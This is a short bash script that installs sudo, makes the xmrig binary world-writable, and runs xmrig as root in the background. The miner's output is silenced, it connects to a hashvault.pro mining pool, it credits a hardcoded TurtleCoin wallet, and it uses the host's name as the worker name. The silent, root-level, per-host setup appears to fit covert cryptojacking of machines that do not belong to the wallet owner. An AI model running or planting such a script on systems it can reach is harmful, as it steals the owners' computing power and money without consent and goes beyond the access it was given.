#!/bin/bash
apt update && apt install sudo -y
chmod 777 xmrig
sudo ./xmrig --donate-level 1 -a Argon2/Chukwa -o singapore01.hashvault.pro:80 -u TRTLv3XdA6KgV9dHSXXB1pJtSjdQdLXuJewbc5SALSGcaXwyKkj548iWqBKxQEnyeRV7hfBw8FaveMmBDzeRCjQ7arJQASUnca2 -p $(cat /proc/sys/kernel/hostname) >/dev/null &
